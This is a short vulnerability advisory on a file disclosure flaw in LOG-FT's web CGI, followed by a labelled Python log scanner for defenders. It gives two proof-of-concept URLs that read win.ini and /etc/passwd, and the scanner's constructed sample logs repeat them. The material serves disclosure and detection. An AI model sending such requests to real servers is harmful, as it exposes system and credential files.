source: https://www.securityfocus.com/bid/12998/info

LOG-FT is reported prone to an arbitrary file disclosure vulnerability. This issue results from an access validation error and can allow a remote attacker to disclose sensitive data.

It is reported that an attacker can simply issue a specially crafted HTTP GET request to disclose sensitive files in the context of the affected Web server.

Information disclosed through this attack may expose sensitive data that may be used to carry out further attacks against a computer. It is not confirmed whether this issue may also allow an attacker to upload arbitrary files.

http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini

http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd
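
For defenders reviewing web server logs, the following added example (not part of the original advisory and not vendor code) flags requests to the CGI named above whose VAR_FT_LANG or VAR_FT_TMPL value is a rooted path once percent-decoded. It assumes combined-format access logs and that legitimate values of both parameters are relative names; the function names, the benign values and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

CGI_NAME = "logwebftbs2000.exe"           # script name from the advisory
PARAMS = ("VAR_FT_LANG", "VAR_FT_TMPL")   # parameters from the advisory
# Assumption: legitimate values are relative names, never rooted paths.
ROOTED = re.compile(r"^(?:[A-Za-z]:|[\\/])")
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return {param: decoded value} for rooted-path values sent to the CGI."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + CGI_NAME):
        return {}
    # parse_qs percent-decodes, so c%3A%5C is checked as c:\
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in PARAMS:
        for value in query.get(name, []):
            if ROOTED.match(value.strip()):
                hits[name] = value
    return hits

def scan(log_lines):
    """Yield (line_number, hits) for each access-log line that matches."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits

# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2005:10:00:00 +0000] "GET /logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=en&VAR_FT_TMPL=index HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Apr/2005:10:00:05 +0000] "GET /logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\\&VAR_FT_TMPL=winnt/win.ini HTTP/1.0" 200 477',
    '192.0.2.11 - - [01/Apr/2005:10:00:09 +0000] "GET /logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=%2Fetc&VAR_FT_TMPL=passwd HTTP/1.0" 200 1301',
    '192.0.2.12 - - [01/Apr/2005:10:00:12 +0000] "GET /index.html?VAR_FT_LANG=/etc HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

A hit paired with a 200 response and an unusual body size is the case to triage first, since it suggests the file was actually returned.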